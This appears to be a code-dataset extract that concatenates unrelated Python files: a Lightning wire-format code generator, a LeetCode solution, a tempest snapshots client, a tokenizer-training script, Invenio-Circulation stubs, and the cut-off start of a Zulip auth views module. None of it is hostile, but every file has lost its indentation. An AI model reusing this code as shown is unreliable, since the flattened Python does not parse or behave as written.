self.implicit_len = False
self.extension_names = extensions
self.is_optional = optional
self.field_comments = field_comments
def __deepcopy__(self, memo):
deepcopy_method = self.__deepcopy__
self.__deepcopy__ = None
field = copy.deepcopy(self, memo)
self.__deepcopy__ = deepcopy_method
field.type_obj = self.type_obj
return field
def add_count(self, count):
self.count = int(count)
def add_len_field(self, len_field):
self.count = False
# we cache our len-field's name
self.len_field = len_field.name
# the len-field caches our name
len_field.len_field_of = self.name
def add_implicit_len(self):
self.count = False
self.implicit_len = True
def is_array(self):
return self.count > 1
def is_varlen(self):
return not self.count
def is_implicit_len(self):
return self.implicit_len
def is_extension(self):
return bool(self.extension_names)
def size(self, implicit_expression=None):
if self.count:
return self.count
if self.len_field:
return self.len_field
assert self.is_implicit_len()
assert implicit_expression
return implicit_expression
def needs_context(self):
""" A field needs a context if it's varsized """
return self.is_varlen() or self.type_obj.needs_context()
def arg_desc_to(self):
if self.len_field_of:
return ''
type_name = self.type_obj.type_name()
if self.is_array():
return ', const {} {}[{}]'.format(type_name, self.name, self.count)
if self.type_obj.is_assignable() and not self.is_varlen():
name = self.name
if self.is_optional:
name = '*' + name
return ', {} {}'.format(type_name, name)
if self.is_varlen() and self.type_obj.is_varsize():
return ', const {} **{}'.format(type_name, self.name)
return ', const {} *{}'.format(type_name, self.name)
def arg_desc_from(self):
if self.len_field_of:
return ''
type_name = self.type_obj.type_name()
if self.is_array():
return ', {} {}[{}]'.format(type_name, self.name, self.count)
ptrs = '*'
if self.is_varlen() or self.is_optional or self.type_obj.is_varsize():
ptrs += '*'
if self.is_varlen() and self.type_obj.is_varsize():
ptrs += '*'
return ', {} {}{}'.format(type_name, ptrs, self.name)
class FieldSet(object):
def __init__(self):
self.fields = OrderedDict()
self.len_fields = {}
def add_data_field(self, field_name, type_obj, count=1,
extensions=[], comments=[], optional=False,
implicit_len_ok=False):
field = Field(field_name, type_obj, extensions=extensions,
field_comments=comments, optional=optional)
if bool(count):
try:
field.add_count(int(count))
except ValueError:
if count in self.fields:
len_field = self.find_data_field(count)
field.add_len_field(len_field)
self.len_fields[len_field.name] = len_field
else:
# '...' means "rest of TLV"
assert implicit_len_ok
assert count == '...'
field.add_implicit_len()
# You can't have any fields after an implicit-length field.
if len(self.fields) != 0:
assert not self.fields[next(reversed(self.fields))].is_implicit_len()
self.fields[field_name] = field
def find_data_field(self, field_name):
return self.fields[field_name]
def get_len_fields(self):
return list(self.len_fields.values())
def has_len_fields(self):
return bool(self.len_fields)
def needs_context(self):
return any([field.needs_context() or field.is_optional for field in self.fields.values()])
class Type(FieldSet):
assignables = [
'u8',
'u16',
'u32',
'u64',
'tu16',
'tu32',
'tu64',
'bool',
'amount_sat',
'amount_msat',
'bigsize',
'varint'
]
typedefs = [
'u8',
'u16',
'u32',
'u64',
'bool',
'secp256k1_ecdsa_signature',
'secp256k1_ecdsa_recoverable_signature',
'wirestring',
'double',
'bigsize',
'varint',
]
truncated_typedefs = [
'tu16',
'tu32',
'tu64',
]
# Externally defined variable size types (require a context)
varsize_types = [
'peer_features',
'gossip_getnodes_entry',
'gossip_getchannels_entry',
'failed_htlc',
'utxo',
'bitcoin_tx',
'wirestring',
'per_peer_state',
'bitcoin_tx_output',
'exclude_entry',
]
# Some BOLT types are re-typed based on their field name
# ('fieldname partial', 'original type', 'outer type'): ('true type', 'collapse array?')
name_field_map = {
('txid', 'sha256'): ('bitcoin_txid', False),
('amt', 'u64'): ('amount_msat', False),
('msat', 'u64'): ('amount_msat', False),
('satoshis', 'u64'): ('amount_sat', False),
('node_id', 'pubkey', 'channel_announcement'): ('node_id', False),
('node_id', 'pubkey', 'node_announcement'): ('node_id', False),
('temporary_channel_id', 'u8'): ('channel_id', True),
('secret', 'u8'): ('secret', True),
('preimage', 'u8'): ('preimage', True),
}
# For BOLT specified types, a few type names need to be simply 'remapped'
# 'original type': 'true type'
name_remap = {
'byte': 'u8',
'signature': 'secp256k1_ecdsa_signature',
'chain_hash': 'bitcoin_blkid',
'point': 'pubkey',
# FIXME: omits 'pad'
}
@staticmethod
def true_type(type_name, field_name=None, outer_name=None):
""" Returns 'true' type of a given type and a flag if
we've remapped a variable size/array type to a single struct
(an example of this is 'temporary_channel_id' which is specified
as a 32*byte, but we re-map it to a channel_id
"""
if type_name in Type.name_remap:
type_name = Type.name_remap[type_name]
if field_name:
for t, true_type in Type.name_field_map.items():
if t[0] in field_name and t[1] == type_name:
if len(t) == 2 or outer_name == t[2]:
return true_type
return (type_name, False)
def __init__(self, name):
FieldSet.__init__(self)
self.name, self.is_enum = self.parse_name(name)
self.depends_on = {}
self.type_comments = []
self.tlv = False
def parse_name(self, name):
if name.startswith('enum '):
return name[5:], True
return name, False
def add_data_field(self, field_name, type_obj, count=1,
extensions=[], comments=[], optional=False):
FieldSet.add_data_field(self, field_name, type_obj, count,
extensions=extensions,
comments=comments, optional=optional)
if type_obj.name not in self.depends_on:
self.depends_on[type_obj.name] = type_obj
def type_name(self):
if self.name in self.typedefs:
return self.name
if self.name in self.truncated_typedefs:
return self.name[1:]
if self.is_enum:
prefix = 'enum '
else:
prefix = 'struct '
return prefix + self.struct_name()
# We only accelerate the u8 case: it's common and trivial.
def has_array_helper(self):
return self.name in ['u8']
def struct_name(self):
if self.is_tlv():
return self.tlv.struct_name()
return self.name
def subtype_deps(self):
return [dep for dep in self.depends_on.values() if dep.is_subtype()]
def is_subtype(self):
return bool(self.fields)
def is_truncated(self):
return self.name in self.truncated_typedefs
def needs_context(self):
return self.is_varsize()
def is_assignable(self):
""" Generally typedef's and enums """
return self.name in self.assignables or self.is_enum
def is_varsize(self):
""" A type is variably sized if it's marked as such (in varsize_types)
or it contains a field of variable length """
return self.name in self.varsize_types or self.has_len_fields()
def add_comments(self, comments):
self.type_comments = comments
def mark_tlv(self, tlv):
self.tlv = tlv
def is_tlv(self):
return bool(self.tlv)
class Message(FieldSet):
def __init__(self, name, number, option=[], enum_prefix='wire',
struct_prefix=None, comments=[]):
FieldSet.__init__(self)
self.name = name
self.number = number
self.enum_prefix = enum_prefix
self.option = option[0] if len(option) else None
self.struct_prefix = struct_prefix
self.enumname = None
self.msg_comments = comments
def has_option(self):
return self.option is not None
def enum_name(self):
name = self.enumname if self.enumname else self.name
return "{}_{}".format(self.enum_prefix, name).upper()
def struct_name(self):
if self.struct_prefix:
return self.struct_prefix + "_" + self.name
return self.name
class Tlv(object):
def __init__(self, name):
self.name = name
self.messages = {}
def add_message(self, tokens, comments=[]):
""" tokens -> (name, value[, option]) """
self.messages[tokens[0]] = Message(tokens[0], tokens[1], option=tokens[2:],
enum_prefix=self.name,
struct_prefix=self.struct_name(),
comments=comments)
def type_name(self):
return 'struct ' + self.struct_name()
def struct_name(self):
return "tlv_{}".format(self.name)
def find_message(self, name):
return self.messages[name]
def ordered_msgs(self):
return sorted(self.messages.values(), key=lambda item: int(item.number))
class Master(object):
types = {}
tlvs = {}
messages = {}
extension_msgs = {}
inclusions = []
top_comments = []
def add_comments(self, comments):
self.top_comments += comments
def add_include(self, inclusion):
self.inclusions.append(inclusion)
def add_tlv(self, tlv_name):
if tlv_name not in self.tlvs:
self.tlvs[tlv_name] = Tlv(tlv_name)
if tlv_name not in self.types:
self.types[tlv_name] = Type(tlv_name)
return self.tlvs[tlv_name]
def add_message(self, tokens, comments=[]):
""" tokens -> (name, value[, option])"""
self.messages[tokens[0]] = Message(tokens[0], tokens[1], option=tokens[2:],
comments=comments)
def add_extension_msg(self, name, msg):
self.extension_msgs[name] = msg
def add_type(self, type_name, field_name=None, outer_name=None):
optional = False
if type_name.startswith('?'):
type_name = type_name[1:]
optional = True
# Check for special type name re-mapping
type_name, collapse_original = Type.true_type(type_name, field_name,
outer_name)
if type_name not in self.types:
self.types[type_name] = Type(type_name)
return self.types[type_name], collapse_original, optional
def find_type(self, type_name):
return self.types[type_name]
def find_message(self, msg_name):
if msg_name in self.messages:
return self.messages[msg_name]
if msg_name in self.extension_msgs:
return self.extension_msgs[msg_name]
return None
def find_tlv(self, tlv_name):
return self.tlvs[tlv_name]
def get_ordered_subtypes(self):
""" We want to order subtypes such that the 'no dependency'
types are printed first """
subtypes = [s for s in self.types.values() if s.is_subtype()]
# Start with subtypes without subtype dependencies
sorted_types = [s for s in subtypes if not len(s.subtype_deps())]
unsorted = [s for s in subtypes if len(s.subtype_deps())]
while len(unsorted):
names = [s.name for s in sorted_types]
for s in list(unsorted):
if all([dependency.name in names for dependency in s.subtype_deps()]):
sorted_types.append(s)
unsorted.remove(s)
return sorted_types
def tlv_messages(self):
return [m for tlv in self.tlvs.values() for m in tlv.messages.values()]
def find_template(self, options):
dirpath = os.path.dirname(os.path.abspath(__file__))
filename = dirpath + '/gen/{}{}_template'.format(
'print_' if options.print_wire else '', options.page)
return Template(filename=filename)
def post_process(self):
""" method to handle any 'post processing' that needs to be done.
for now, we just need match up types to TLVs """
for tlv_name, tlv in self.tlvs.items():
if tlv_name in self.types:
self.types[tlv_name].mark_tlv(tlv)
def write(self, options, output):
template = self.find_template(options)
enum_sets = []
enum_sets.append({
'name': options.enum_name,
'set': self.messages.values(),
})
stuff = {}
stuff['top_comments'] = self.top_comments
stuff['options'] = options
stuff['idem'] = re.sub(r'[^A-Z]+', '_', options.header_filename.upper())
stuff['header_filename'] = options.header_filename
stuff['includes'] = self.inclusions
stuff['enum_sets'] = enum_sets
subtypes = self.get_ordered_subtypes()
stuff['structs'] = subtypes + self.tlv_messages()
stuff['tlvs'] = self.tlvs
# We leave out extension messages in the printing pages. Any extension
# fields will get printed under the 'original' message, if present
if options.print_wire:
stuff['messages'] = list(self.messages.values())
else:
stuff['messages'] = list(self.messages.values()) + list(self.extension_msgs.values())
stuff['subtypes'] = subtypes
print(template.render(**stuff), file=output)
def main(options, args=None, output=sys.stdout, lines=None):
genline = next_line(args, lines)
comment_set = []
# Create a new 'master' that serves as the coordinator for the file generation
master = Master()
try:
while True:
ln, line = next(genline)
tokens = line.split(',')
token_type = tokens[0]
if not bool(line):
master.add_comments(comment_set)
comment_set = []
continue
if token_type == 'subtype':
subtype, _, _ = master.add_type(tokens[1])
subtype.add_comments(list(comment_set))
comment_set = []
elif token_type == 'subtypedata':
subtype = master.find_type(tokens[1])
if not subtype:
raise ValueError('Unknown subtype {} for data.\nat {}:{}'
.format(tokens[1], ln, line))
type_obj, collapse, optional = master.add_type(tokens[3], tokens[2], tokens[1])
if optional:
raise ValueError('Subtypes cannot have optional fields {}.{}\n at {}:{}'
.format(subtype.name, tokens[2], ln, line))
if collapse:
count = 1
else:
count = tokens[4]
subtype.add_data_field(tokens[2], type_obj, count, comments=list(comment_set),
optional=optional)
comment_set = []
elif token_type == 'tlvtype':
tlv = master.add_tlv(tokens[1])
tlv.add_message(tokens[2:], comments=list(comment_set))
comment_set = []
elif token_type == 'tlvdata':
type_obj, collapse, optional = master.add_type(tokens[4], tokens[3], tokens[1])
if optional:
raise ValueError('TLV messages cannot have optional fields {}.{}\n at {}:{}'
.format(tokens[2], tokens[3], ln, line))
tlv = master.find_tlv(tokens[1])
if not tlv:
raise ValueError('tlvdata for unknown tlv {}.\nat {}:{}'
.format(tokens[1], ln, line))
msg = tlv.find_message(tokens[2])
if not msg:
raise ValueError('tlvdata for unknown tlv-message {}.\nat {}:{}'
.format(tokens[2], ln, line))
if collapse:
count = 1
else:
count = tokens[5]
msg.add_data_field(tokens[3], type_obj, count, comments=list(comment_set),
optional=optional, implicit_len_ok=True)
comment_set = []
elif token_type == 'msgtype':
master.add_message(tokens[1:], comments=list(comment_set))
comment_set = []
elif token_type == 'msgdata':
msg = master.find_message(tokens[1])
if not msg:
raise ValueError('Unknown message type {}. {}:{}'.format(tokens[1], ln, line))
type_obj, collapse, optional = master.add_type(tokens[3], tokens[2], tokens[1])
if collapse:
count = 1
else:
count = tokens[4]
# if this is an 'extension' field*, we want to add a new 'message' type
# in the future, extensions will be handled as TLV's
#
# *(in the spec they're called 'optional', but that term is overloaded
# in that internal wire messages have 'optional' fields that are treated
# differently. for the sake of clarity here, for bolt-wire messages,
# we'll refer to 'optional' message fields as 'extensions')
#
if tokens[5:] == []:
msg.add_data_field(tokens[2], type_obj, count, comments=list(comment_set),
optional=optional)
else: # is one or more extension fields
if optional:
raise ValueError("Extension fields cannot be optional. {}:{}"
.format(ln, line))
orig_msg = msg
for extension in tokens[5:]:
extension_name = "{}_{}".format(tokens[1], extension)
msg = master.find_message(extension_name)
if not msg:
msg = copy.deepcopy(orig_msg)
msg.enumname = msg.name
msg.name = extension_name
master.add_extension_msg(msg.name, msg)
msg.add_data_field(tokens[2], type_obj, count, comments=list(comment_set), optional=optional)
# If this is a print_wire page, add the extension fields to the
# original message, so we can print them if present.
if options.print_wire:
orig_msg.add_data_field(tokens[2], type_obj, count=count,
extensions=tokens[5:],
comments=list(comment_set),
optional=optional)
comment_set = []
elif token_type.startswith('#include'):
master.add_include(token_type)
elif token_type.startswith('#'):
comment_set.append(token_type[1:])
else:
raise ValueError("Unknown token type {} on line {}:{}".format(token_type, ln, line))
except StopIteration:
pass
master.post_process()
master.write(options, output)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("-s", "--expose-subtypes", help="print subtypes in header",
action="store_true", default=False)
parser.add_argument("-P", "--print_wire", help="generate wire printing source files",
action="store_true", default=False)
parser.add_argument("--page", choices=['header', 'impl'], help="page to print")
parser.add_argument('--expose-tlv-type', action='append', default=[])
parser.add_argument('header_filename', help='The filename of the header')
parser.add_argument('enum_name', help='The name of the enum to produce')
parser.add_argument("files", help='Files to read in (or stdin)', nargs=REMAINDER)
parsed_args = parser.parse_args()
main(parsed_args, parsed_args.files)
|
py | 1a34894c130390282c48bad70601198b82112381 | class Solution(object):
def minWindow(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
new_t = {}
for char in t:
if char in new_t:
new_t[char] += 1
else:
new_t[char] = 1
new_s = []
for i, char in enumerate(s):
if char in new_t:
new_s.append([i, char])
window = {}
formed = 0
left = 0
res = [float('inf'), 0, 0]
for right in range(len(new_s)):
char = new_s[right][1]
if char in window:
window[char] += 1
else:
window[char] = 1
if window[char] == new_t[char] :
formed += 1
while formed == len(new_t) and left <= right:
char = new_s[left][1]
start = new_s[left][0]
end = new_s[right][0]
if end-start+1 < res[0]:
res[0] = end-start+1
res[1] = start
res[2] = end
window[char] -= 1
left += 1
if window[char] < new_t[char]:
formed -= 1
return '' if res[0] == float('inf') else s[res[1]:res[2]+1]
sol = Solution()
s1 = 'ADOBECODEBANC'
t1 = 'ABC'
ans1 = sol.minWindow(s1, t1)
print(ans1)
|
py | 1a34898f957c5cbbc38e750e6e3502bac358db59 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import time
import urllib
from tempest.common.rest_client import RestClient
from tempest import exceptions
from tempest.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class SnapshotsClientJSON(RestClient):
"""Client class to send CRUD Volume API requests."""
def __init__(self, config, username, password, auth_url, tenant_name=None):
super(SnapshotsClientJSON, self).__init__(config, username, password,
auth_url, tenant_name)
self.service = self.config.volume.catalog_type
self.build_interval = self.config.volume.build_interval
self.build_timeout = self.config.volume.build_timeout
def list_snapshots(self, params=None):
"""List all the snapshot."""
url = 'snapshots'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
return resp, body['snapshots']
def list_snapshots_with_detail(self, params=None):
"""List the details of all snapshots."""
url = 'snapshots/detail'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
return resp, body['snapshots']
def get_snapshot(self, snapshot_id):
"""Returns the details of a single snapshot."""
url = "snapshots/%s" % str(snapshot_id)
resp, body = self.get(url)
body = json.loads(body)
return resp, body['snapshot']
def create_snapshot(self, volume_id, **kwargs):
"""
Creates a new snapshot.
volume_id(Required): id of the volume.
force: Create a snapshot even if the volume attached (Default=False)
display_name: Optional snapshot Name.
display_description: User friendly snapshot description.
"""
post_body = {'volume_id': volume_id}
post_body.update(kwargs)
post_body = json.dumps({'snapshot': post_body})
resp, body = self.post('snapshots', post_body, self.headers)
body = json.loads(body)
return resp, body['snapshot']
def update_snapshot(self, snapshot_id, **kwargs):
"""Updates a snapshot."""
put_body = json.dumps({'snapshot': kwargs})
resp, body = self.put('snapshots/%s' % snapshot_id, put_body,
self.headers)
body = json.loads(body)
return resp, body['snapshot']
# NOTE(afazekas): just for the wait function
def _get_snapshot_status(self, snapshot_id):
resp, body = self.get_snapshot(snapshot_id)
status = body['status']
# NOTE(afazekas): snapshot can reach an "error"
# state in a "normal" lifecycle
if (status == 'error'):
raise exceptions.SnapshotBuildErrorException(
snapshot_id=snapshot_id)
return status
# NOTE(afazkas): Wait reinvented again. It is not in the correct layer
def wait_for_snapshot_status(self, snapshot_id, status):
"""Waits for a Snapshot to reach a given status."""
start_time = time.time()
old_value = value = self._get_snapshot_status(snapshot_id)
while True:
dtime = time.time() - start_time
time.sleep(self.build_interval)
if value != old_value:
LOG.info('Value transition from "%s" to "%s"'
'in %d second(s).', old_value,
value, dtime)
if (value == status):
return value
if dtime > self.build_timeout:
message = ('Time Limit Exceeded! (%ds)'
'while waiting for %s, '
'but we got %s.' %
(self.build_timeout, status, value))
raise exceptions.TimeoutException(message)
time.sleep(self.build_interval)
old_value = value
value = self._get_snapshot_status(snapshot_id)
def delete_snapshot(self, snapshot_id):
"""Delete Snapshot."""
return self.delete("snapshots/%s" % str(snapshot_id))
def is_resource_deleted(self, id):
try:
self.get_snapshot(id)
except exceptions.NotFound:
return True
return False
def reset_snapshot_status(self, snapshot_id, status):
"""Reset the specified snapshot's status."""
post_body = json.dumps({'os-reset_status': {"status": status}})
resp, body = self.post('snapshots/%s/action' % snapshot_id, post_body,
self.headers)
return resp, body
def update_snapshot_status(self, snapshot_id, status, progress):
"""Update the specified snapshot's status."""
post_body = {
'status': status,
'progress': progress
}
post_body = json.dumps({'os-update_snapshot_status': post_body})
url = 'snapshots/%s/action' % str(snapshot_id)
resp, body = self.post(url, post_body, self.headers)
return resp, body
def create_snapshot_metadata(self, snapshot_id, metadata):
"""Create metadata for the snapshot."""
put_body = json.dumps({'metadata': metadata})
url = "snapshots/%s/metadata" % str(snapshot_id)
resp, body = self.post(url, put_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def get_snapshot_metadata(self, snapshot_id):
"""Get metadata of the snapshot."""
url = "snapshots/%s/metadata" % str(snapshot_id)
resp, body = self.get(url, self.headers)
body = json.loads(body)
return resp, body['metadata']
def update_snapshot_metadata(self, snapshot_id, metadata):
"""Update metadata for the snapshot."""
put_body = json.dumps({'metadata': metadata})
url = "snapshots/%s/metadata" % str(snapshot_id)
resp, body = self.put(url, put_body, self.headers)
body = json.loads(body)
return resp, body['metadata']
def update_snapshot_metadata_item(self, snapshot_id, id, meta_item):
"""Update metadata item for the snapshot."""
put_body = json.dumps({'meta': meta_item})
url = "snapshots/%s/metadata/%s" % (str(snapshot_id), str(id))
resp, body = self.put(url, put_body, self.headers)
body = json.loads(body)
return resp, body['meta']
def delete_snapshot_metadata_item(self, snapshot_id, id):
"""Delete metadata item for the snapshot."""
url = "snapshots/%s/metadata/%s" % (str(snapshot_id), str(id))
resp, body = self.delete(url, self.headers)
return resp, body
|
py | 1a348a49900dd056d743b15b33cc3c9fb614b52b | import sys
import os
sys.path.append(os.getcwd())
import torch
import tokenizers
import sklearn
from tokenizers import SentencePieceBPETokenizer
from tokenizers import SentencePieceUnigramTokenizer
from tokenizers import BertWordPieceTokenizer
from tokenizers import Tokenizer
from tokenizers.models import WordPiece
from tokenizers.trainers import WordPieceTrainer, BpeTrainer, UnigramTrainer
# whitespace pretokenizer ?
from tokenizers.pre_tokenizers import Whitespace
# use bert pretokenizer
from typing import List
unk_token = "<UNK>"
spl_tokens = ["<UNK>", "<SEP>", "<MASK>", "<CLS>"]
def is_filepath_list(filelist: List[str]) -> bool:
"""
Check if a list of filepaths is a list of files.
"""
for file in filelist:
if not os.path.isfile(file):
return False
return True
def train_iterator_mul_files(files):
for path in files:
with open(path, "r") as f:
for line in f:
yield line
def train_WordPieceTokenizer(file_list: List[str], vocab_size=30_000, min_frequency=5, limit_alphabet=500,
save: bool = True):
"""
Train WP tokenizer from a list of files.
"""
tokenizer = Tokenizer(WordPiece(unk_token=unk_token))
trainer = WordPieceTrainer(
vocab_size=vocab_size,
min_frequency=min_frequency,
special_tokens=spl_tokens,
show_progress=True,
limit_alphabet=limit_alphabet
)
tokenizer.pre_tokenizer = Whitespace()
if is_filepath_list(file_list):
tokenizer.train(file_list, trainer=trainer)
else:
trainer.train_from_iterator(file_list, trainer=trainer)
if save:
tokenizer.save("./WP_tok-trained.json")
tokenizer = Tokenizer.from_file("./WP_tok-trained.json")
return tokenizer
def train_SentencePieceBPETokenizer(files: List[str], vocab_size=30_000, min_frequency=5, limit_alphabet=500,
save: bool = True):
"""
trin SP_BPE tokenizer from a list of files.
"""
if is_filepath_list(files):
train_it = train_iterator_mul_files(files)
else:
train_it = files
tokenizer = SentencePieceBPETokenizer()
tokenizer.train_from_iterator(
train_it,
vocab_size=vocab_size,
min_frequency=min_frequency,
show_progress=True,
limit_alphabet=limit_alphabet,
)
if save:
tokenizer.save("./SP_BPE_tok-trained.json")
tokenizer = Tokenizer.from_file("./SP_BPE_tok-trained.json")
return tokenizer
def train_SentencePieceUGTokenizer(filelist: List[str], vocab_size=30_000, save: bool = True):
"""
trin SP_UG tokenizer from a list of files.
"""
if is_filepath_list(filelist):
train_it = train_iterator_mul_files(filelist)
else:
train_it = filelist
tokenizer = SentencePieceUnigramTokenizer()
tokenizer.train_from_iterator(
train_it,
vocab_size=vocab_size,
show_progress=True
)
if save:
tokenizer.save("./SP_UG_tok-trained.json")
tokenizer = Tokenizer.from_file("./SP_UG_tok-trained.json")
return tokenizer
def train_BertWordPieceTokenizer(filelist: List[str], vocab_size=30_000, min_frequency=5, limit_alphabet=500,
save: bool = True):
"""
trin BERT tokenizer from a list of files.
"""
if is_filepath_list(filelist):
train_it = train_iterator_mul_files(filelist)
else:
train_it = filelist
tokenizer = BertWordPieceTokenizer()
tokenizer.normalizer = tokenizers.normalizers.BertNormalizer(strip_accents=True, lowercase=True)
tokenizer.train_from_iterator(
train_it,
vocab_size=vocab_size,
show_progress=True,
min_frequency=min_frequency,
limit_alphabet=limit_alphabet,
)
if save:
tokenizer.save("./BERT_tok-trained.json")
tokenizer = Tokenizer.from_file("./BERT_tok-trained.json")
return tokenizer
def get_vocab_from_tokenizer(tokenizer: Tokenizer):
"""
Get vocab from tokenizer.
"""
vocab = tokenizer.get_vocab()
return vocab
if __name__ == '__main__':
# create corpus
print(os.getcwd())
corpus = os.listdir(".corpus_caches/orcas/medium")
corpus = [".corpus_caches/orcas/medium/" + file for file in corpus]
tokenizer = train_BertWordPieceTokenizer(corpus, vocab_size=30_000)
|
py | 1a348a5267e91d3f3720e89c7cc5d7778794cc3d | # -*- coding: utf-8 -*-
#
# Copyright (C) 2018-2020 CERN.
# Copyright (C) 2018-2020 RERO.
#
# Invenio-Circulation is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Circulation API."""
import arrow
from .errors import NotImplementedConfigurationError
def patron_exists(patron_pid):
"""Return True if patron exists, False otherwise."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_PATRON_EXISTS"
)
def item_exists(item_pid):
"""Return True if item exists, False otherwise.
:param item_pid: a dict containing `value` and `type` fields to
uniquely identify the item.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_ITEM_EXISTS"
)
def document_exists(document_pid):
"""Return True if document exists, False otherwise."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_DOCUMENT_EXISTS"
)
# NOTE: Its on purpose `ref` and not `$ref` so it doesn't try to resolve
def item_ref_builder(loan_pid, loan):
"""Return the $ref for item_pid."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_ITEM_REF_BUILDER"
)
# NOTE: Its on purpose `ref` and not `$ref` so it doesn't try to resolve
def patron_ref_builder(patron_pid, loan):
"""Return the $ref for patron_pid."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_PATRON_REF_BUILDER"
)
# NOTE: Its on purpose `ref` and not `$ref` so it doesn't try to resolve
def document_ref_builder(document_pid, loan):
"""Return the $ref for document_pid."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_DOCUMENT_REF_BUILDER"
)
def item_location_retriever(item_pid):
"""Retrieve the location pid of the passed item pid.
:param item_pid: a dict containing `value` and `type` fields to
uniquely identify the item.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_ITEM_LOCATION_RETRIEVER"
)
def item_can_circulate(item_pid):
"""Return if item is available for checkout.
:param item_pid: a dict containing `value` and `type` fields to
uniquely identify the item.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.checkout.item_can_circulate"
)
def can_be_requested(loan):
"""Should return True if document or item can be requested."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.request.can_be_requested"
)
def get_default_loan_duration(loan, initial_loan):
"""Return a default loan duration in timedelta.
:param loan: the current loan to extend, updated with transition params
:param initial_loan: the loan before applying transition params
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.checkout.duration_default"
)
def is_loan_duration_valid(loan):
"""Validate the loan duration."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.checkout.duration_validate"
)
def get_default_extension_duration(loan, initial_loan):
"""Return a default extension duration in timedelta.
:param loan: the current loan to extend, updated with transition params
:param initial_loan: the loan before applying transition params
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.extension.duration_default"
)
def get_default_extension_max_count(loan):
"""Return a default extensions max count."""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_POLICIES.extension.max_count"
)
def transaction_location_validator(transaction_location_pid):
"""Validate that the given transaction location PID is valid.
:param transaction_location_pid: the transaction location PID sent with
the REST request.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_TRANSACTION_LOCATION_VALIDATOR"
)
def transaction_user_validator(transaction_user_pid):
"""Validate that the given transaction user PID is valid.
:param transaction_user_pid: the transaction user PID sent with
the REST request.
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_TRANSACTION_USER_VALIDATOR"
)
def str2datetime(str_date):
"""Parse string date with timezone and return a datetime object."""
return arrow.get(str_date).to('utc')
def validate_item_pickup_transaction_locations(loan, destination, **kwargs):
"""Validate the loan item, pickup and transaction locations.
This also allow for extra validation if needed at the library level.
:param loan: the loan
:param destination: the destination of the loan
:return: False if validation is not possible, otherwise True
"""
raise NotImplementedConfigurationError(
config_variable="CIRCULATION_LOAN_LOCATIONS_VALIDATION"
)
|
py | 1a348b90731e382312e271a6ca5944eb4dc96c71 |
from django.conf import settings
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
from django.contrib.auth import authenticate, get_backends
from django.contrib.auth.views import login as django_login_page, \
logout_then_login as django_logout_then_login
from django.contrib.auth.views import password_reset as django_password_reset
from django.urls import reverse
from zerver.decorator import authenticated_json_post_view, require_post, \
process_client, do_login, log_view_func
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect, \
HttpResponseNotFound
from django.middleware.csrf import get_token
from django.shortcuts import redirect, render
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_GET
from django.utils.translation import ugettext as _
from django.utils.http import is_safe_url
from django.core import signing
import urllib
from typing import Any, Dict, List, Optional, Tuple, Text
from confirmation.models import Confirmation, create_confirmation_link
from zerver.context_processors import zulip_default_context, get_realm_from_request
from zerver.forms import HomepageForm, OurAuthenticationForm, \
WRONG_SUBDOMAIN_ERROR, ZulipPasswordResetForm
from zerver.lib.mobile_auth_otp import is_valid_otp, otp_encrypt_api_key
from zerver.lib.push_notifications import push_notifications_enabled
from zerver.lib.request import REQ, has_request_variables, JsonableError
from zerver.lib.response import json_success, json_error
from zerver.lib.subdomains import get_subdomain, is_subdomain_root_or_alias
from zerver.lib.validator import validate_login_email
from zerver.models import PreregistrationUser, UserProfile, remote_user_to_email, Realm, \
get_realm
from zerver.signals import email_on_new_login
from zproject.backends import password_auth_enabled, dev_auth_enabled, \
github_auth_enabled, google_auth_enabled, ldap_auth_enabled, \
ZulipLDAPConfigurationError, ZulipLDAPAuthBackend, email_auth_enabled, \
remote_auth_enabled
from version import ZULIP_VERSION
import hashlib
import hmac
import jwt
import logging
import requests
import time
import ujson
def get_safe_redirect_to(url: Text, redirect_host: Text) -> Text:
is_url_safe = is_safe_url(url=url, host=redirect_host)
if is_url_safe:
return urllib.parse.urljoin(redirect_host, url)
else:
return redirect_host
def create_preregistration_user(email: Text, request: HttpRequest, realm_creation: bool=False,
password_required: bool=True) -> HttpResponse:
realm = None
if not realm_creation:
realm = get_realm(get_subdomain(request))
return PreregistrationUser.objects.create(email=email,
realm_creation=realm_creation,
password_required=password_required,
realm=realm)
def maybe_send_to_registration(request: HttpRequest, email: Text, full_name: Text='',
password_required: bool=True) -> HttpResponse:
realm = get_realm_from_request(request)
from_multiuse_invite = False
multiuse_obj = None
streams_to_subscribe = None
multiuse_object_key = request.session.get("multiuse_object_key", None)
if multiuse_object_key is not None:
from_multiuse_invite = True
multiuse_obj = Confirmation.objects.get(confirmation_key=multiuse_object_key).content_object
realm = multiuse_obj.realm
streams_to_subscribe = multiuse_obj.streams.all()
